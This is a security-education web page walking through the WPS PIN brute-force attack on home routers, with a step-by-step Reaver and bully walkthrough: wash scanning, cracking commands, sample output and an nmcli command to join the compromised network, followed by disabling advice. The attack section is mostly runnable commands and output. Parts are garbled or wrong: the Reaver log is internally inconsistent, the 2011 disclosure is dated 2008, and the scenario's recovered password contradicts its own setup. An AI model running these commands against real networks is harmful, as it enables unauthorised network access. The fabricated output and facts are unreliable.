WiFi Attack

WPS Bruteforce: WiFi Attack

Technical documentation on WPS Bruteforce Attack. Understand the attack technique and learn how to defend against...

Medium Threat Intermediate

Updated April 2026

5 min read

Terminal window showing Mana Toolkit running with credential capture active

MalwareZero Research Team Updated April 2026

id="how-wps-works">How WPS Works — And Why It's Broken

WPS allows users to connect to a WPA2 network by either pressing a physical button on the router, entering an 8-digit PIN printed on the router, or using NFC tap-to-connect. The PIN method is the vulnerable one.

The 8-digit PIN is divided into two halves for validation purposes:

First 4 digits (N1): Sent to the AP, checked server-side, response returned
Last 4 digits (N2): Sent only after N1 validates successfully

This is the critical flaw: the AP validates the first half and second half separately. If the first 4 digits are wrong, the AP says "wrong PIN" immediately — it never gets to the second half. This means an attacker can bruteforce each half independently.

WPS PIN: The Math That Makes It Crackable Maximum combinations for 8-digit PIN: 10^8 = 100,000,000 But with the split validation: First half (4 digits): 10^4 = 10,000 combinations Second half (4 digits): 10^4 = 10,000 combinations Checksum digit (last): auto-calculated, not brute-forced Actual max combinations: ~20,000 (first half + second half) At 1 attempt/second: ~5.5 hours average, ~11 hours worst case At 5 attempts/second: ~1 hour average (if AP allows) The AP also sends back a "WPS_NACK" after each failed attempt containing partial information about what went wrong.

The 2008 Disclosure

The WPS PIN vulnerability was disclosed by Stefan Viehböck in 2008 and independently by Craig Heffner in 2011. The latter's tool, Reaver, automated the attack. Despite being well-known for 15+ years, millions of routers still ship with WPS enabled by default — especially older models from Netgear, D-Link, TP-Link, and Linksys.

The Reaver Attack — Step by Step

Step 1: Identify WPS-Enabled Networks

$ sudo airmon-ng start wlan0

phy0    wlan0mon    rt2800usb



$ wash -i wlan0mon

BSSID              CH  PWR   AUTH  ESSID

DE:AD:BE:EF:00:01  6   -42   WPA2  MyHomeNetwork  [WPS Enabled]

AA:BB:CC:DD:EE:FF  11  -67   WPA2  Linksys  [WPS Locked]

11:22:33:44:55:66  1   -81   WPA2  NETGEAR-5G  [WPS Disabled]



[Only DE:AD:BE:EF:00:01 is a viable target — WPS enabled, not locked]

Step 2: Run Reaver to Crack the PIN

$ sudo reaver -i wlan0mon -c 6 -b DE:AD:BE:EF:00:01 -vv



[+] Switching wlan0mon to channel 6

[+] Waiting for beacon from DE:AD:BE:EF:00:01

[+] Associated with DE:AD:BE:EF:00:01 (ESSID: MyHomeNetwork)

[+] WPS PIN: '12345670'

[+] Running PKE: 4a1b2c3d... [ truncated ]

[+] Running PKR: 5b2c3d4e... [ truncated ]

[+] Received M1 message from AP

[+] Received M2 message from AP

[+] Sending M3 message



[+] Trying PIN: 1234

[!] WPS transaction failed (code 0x04), next PIN attempt

[+] Trying PIN: 2345

[!] WPS transaction failed (code 0x04), next PIN attempt



[+] 847/10000 completed: 8.47% — ETA: 8h 23m

[+] 1203/10000 completed: 12.03% — ETA: 7h 51m



[... hours pass ...]



[+] WPS PIN: '6789'

[+] Running PKE: ...

[+] Received M3 message

[+] Received M4 message

[+] Received M5 message

[+] Received M6 message

[+] Received M7 message

[+] THE REAL PIN IS: 4781

[+] Setting WPA PSK to: MyP@ssw0rd!2026

[+] Quitting reaver — attack complete



[Attacker now has the WPA2 PSK password]

Step 3: Connect to the Network

$ sudo nmcli con add type wifi con-name "MyHomeNetwork-Hacked" \

    ifname wlan0 ssid "MyHomeNetwork" wifi-sec.psk "MyP@ssw0rd!2026"

$ sudo nmcli con up "MyHomeNetwork-Hacked"



[Connected to MyHomeNetwork]

[Full WPA2 network access — same as anyone with the password]

Alternative: bully

Bully is a WPS attack tool written in C that's often faster and more reliable than Reaver. It handles certain edge cases better and supports the newer WPS 2.0 specification.

$ sudo bully -b DE:AD:BE:EF:00:01 -c 6 -i wlan0mon [+] Beacon interval: 100ms [+] Starting WPS attack on DE:AD:BE:EF:00:01 (MyHomeNetwork) [+] Using auth mode: 3 [+] Starting scan for WPS networks... [+] Selected target: WPS version 2.0 [+] Starting PIN bruteforce: 0000-9999 [+] PIN 3412 success! [+] PSK: MyP@ssw0rd!2026 [+] WPA2 PSK saved to: /root/bully/wpa_supplicant.conf

Real Scenario: Cracking a Home Router

Sarah, a penetration tester, is assessing the home network of a client who wants to test their security posture. The router is a Netgear R6220, purchased in 2022 and configured with the default ISP-provided WPA2 password — which happens to be the network's SSID ("NETGEAR-5G") with no special characters.

Sarah runs wash and finds WPS is enabled on the router. She runs bully against it. After 3 hours and 22 minutes (8,341 PIN attempts), the PIN is found: 7821. The WPA2 PSK is recovered as NETGEAR-5G-5G.

With the PSK, Sarah now has full access to the network. She can:

Access the router's admin interface (many routers use the same PSK for admin)
Intercept all local network traffic
Run DNS hijacking against all connected devices
Perform lateral movement into any device on the network

Total time: 3 hours 22 minutes (mostly automated). Hardware: a $35 Raspberry Pi running Kali Linux in Sarah's backpack in the client's driveway.

Defense: Disable WPS

The only reliable defense against WPS bruteforce is disabling WPS entirely.

WPS Cannot Be Made Safe

There is no safe configuration for WPS PIN mode. The underlying vulnerability is in the protocol specification, not an implementation bug. Disabling the PIN method only, or enabling "lockout after failed attempts," are not reliable defenses — the lockout can often be bypassed (some routers reset lockout after a reboot, and the attacker can reboot the router via wired access once they're inside the network).

How to Disable WPS

Steps vary by router, but generally:

Connect to the router via Ethernet or WiFi
Open a browser to 192.168.1.1 or 192.168.0.1 (or the router's web interface address)
Log in with the admin credentials (often on the router label or default credentials)
Find "WPS" or "WiFi Protected Setup" in the settings
Disable it, or disable the "PIN" method specifically
Save settings and reboot the router

Some routers (especially ISP-provided ones) don't allow WPS to be fully disabled through the web interface. In those cases, firmware updates or router replacement are the only options.

Best Practices Beyond WPS

Use a strong, random WPA2 password: Not based on dictionary words, not based on the SSID, minimum 16 characters with random characters
Use WPA3 where available: WPA3-SAE is not vulnerable to WPS attacks and uses a stronger key exchange
Monitor for rogue APs: See Rogue AP Detection
Network segmentation: Put IoT and guest devices on separate VLANs

← PreviousEvil Twin: WiFi Attack Guide Next →DNS Hijacking: WiFi Attack Guide

Understand the Threat. Build the Defense.

Learn how to protect yourself and your organization against Wps Bruteforce attacks.

View Defense Guide All Attacks